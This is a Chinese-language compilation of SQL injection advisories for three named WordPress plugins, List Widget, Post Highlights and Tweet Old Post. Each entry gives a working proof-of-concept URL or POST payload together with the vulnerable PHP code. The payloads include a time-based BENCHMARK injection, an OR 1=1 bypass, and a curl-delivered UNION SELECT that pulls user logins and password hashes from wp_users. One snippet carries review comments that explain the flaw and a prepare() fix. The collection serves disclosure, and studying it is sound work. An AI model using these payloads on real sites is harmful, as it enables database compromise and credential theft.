最近的 WordPress 插件漏洞整理
# WordPress 的 List Widget 插件在低于 2.0.0 的版本中存在 SQL 注入漏洞
# 测试版本: 2.0.0
---
PoC
---
http://localhost/wp-content/plugins/knr-author-list-widget/knrAuthorListCustomSortSave.php?listItem[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
---------------
存在漏洞的代码
---------------
// Walks the caller-supplied listItem[] array and writes each entry's position back to the users table.
// NOTE(review): the doubled quotes around listItem look like an extraction artifact of $_GET['listItem'].
foreach ($_GET[''listItem''] as $position => $item) :
// Both $position (the array key) and $item (the array value) come straight from the query string and are
// interpolated into the SQL without escaping or casting, so $item rewrites the WHERE clause -- this is
// the injection point. The fix is $wpdb->prepare() with %d placeholders for both values, e.g.
// $wpdb->prepare("UPDATE $wpdb->users SET knr_author_order = %d WHERE ID = %d", $position, $item).
$iterSql = "UPDATE $wpdb->users SET knr_author_order = $position WHERE ID = $item";
$wpdb->query($iterSql);
endforeach;
# WordPress 的 Post Highlights 插件在低于 2.2 的版本中存在 SQL 注入漏洞
# 测试版本: 2.2
# 备注: 复现的前提是 magic_quotes 已关闭（开启时 GET 参数中的引号会被自动转义，PoC 中的引号不会生效）
---
PoC
---
http://localhost/wp-content/plugins/post-highlights/ajax/ph_settings.php?id=-1'' OR 1=1--%20
---------------
存在漏洞的代码
---------------
$id = $_GET["id"];
...
$query = "SELECT guid, ID FROM $wpdb->posts WHERE post_type=''attachment'' AND post_parent=''$id''";
# WordPress 的 Tweet Old Post 插件在低于 3.2.5 的版本中存在 SQL 注入漏洞
# 测试版本: 3.2.5
---------------
PoC (POST数据)
---------------
URL:
http://localhost/wordpress/wp-admin/admin.php?page=ExcludePosts
POST 数据:
delids=1&selFilter=excluded&cat=1=0) UNION ALL SELECT
USER(),concat(user_login,char(58),user_pass),DATABASE(),@@version,null from
wp_users#&setFilter=Filter&s=hello&chkbx=1
例如:
curl --cookie "[COOKIE]" --data "delids=1&selFilter=excluded&cat=1) UNION
ALL SELECT
USER(),concat(user_login,char(58),user_pass),DATABASE(),@@version,null from
wp_users#&setFilter=Filter&s=hello&chkbx=1"
http://localhost/wordpress/wp-admin/admin.php?page=ExcludePosts
---------------
存在漏洞的代码
---------------
70 if(isset($_POST["setFilter"]))
71 {
72 if($_POST["cat"] != 0)
73 {
74 $sql = $sql . " and p.ID IN ( SELECT tr.object_id FROM
".$wpdb->prefix."term_relationships AS tr INNER JOIN
".$wpdb->prefix."term_taxonomy AS tt ON tr.term_taxonomy_id = tt.ter
m_taxonomy_id WHERE tt.taxonomy = ''category'' AND tt.term_id=" .
$_POST["cat"] . ")";
75 $cat_filter = $_POST["cat"];